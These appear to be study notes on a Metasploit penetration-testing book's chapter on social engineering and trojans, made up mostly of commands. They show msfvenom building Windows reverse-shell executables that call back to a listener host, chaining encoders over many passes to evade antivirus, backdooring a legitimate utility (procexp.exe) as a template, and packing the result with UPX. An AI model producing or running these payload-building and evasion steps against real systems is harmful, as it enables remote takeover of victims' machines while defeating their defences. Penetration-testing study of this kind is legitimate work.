Notes on 《Metasploit渗透测试魔鬼训练营》 (Metasploit Penetration Testing Devil Training Camp): Social Engineering & Trojans

Table of contents

  • Trojans
    • msfvenom
    • Using the MSF payload generator to create a standalone binary
    • Evading antivirus detection
      • Using MSF encoders
      • Packing with UPX

Social engineering is an attack method that analyses the target's psychological weaknesses and exploits instinctive human reactions and traits such as curiosity and greed, using means such as impersonation, deception and enticement to reach the attacker's goal.

Trojans


msfvenom

Parameter                 Description
-p, --payload             Specify the payload
--payload-options         List the payload's options
-l, --list [type]         List modules of a type: payloads, encoders, nops, all
-n, --nopsled
-f, --format              Output format (--help-formats lists the available formats)
-e, --encoder
-a, --arch                Target architecture
--platform                Target platform (--help-platforms lists the available platforms)
-s, --space               Maximum size of the resulting payload
--encoder-space           Maximum size of the encoded payload
-b, --bad-chars
-i, --iterations          Number of encoding passes
-c, --add-code            Specify an additional win32 shellcode file to include
-x, --template            Use a custom executable file as the template
-k, --keep                Preserve the template's original functionality
-o, --out
-v, --var-name            Specify a custom variable name to use for certain output formats
--smallest                Generate the smallest possible payload

Using the MSF payload generator to create a standalone binary

msfvenom -p windows/shell_reverse_tcp --payload-options
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -f exe -o payload1.exe
Start a listener in the Metasploit framework, then run the binary on the target machine:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.200
LHOST => 10.10.10.200
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > run

Evading antivirus detection

Using MSF encoders

msfvenom -l encoders

Name Rank Description
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual BMP Polyglot
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -f exe -o payload2.exe

file payload2.exe
payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Multiple encoding passes (chaining encoders)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe

Custom executable template
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -x procexp.exe -i 10 -f exe -o pe_backdoor.exe

Packing with UPX

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

upx -5 payload3.exe
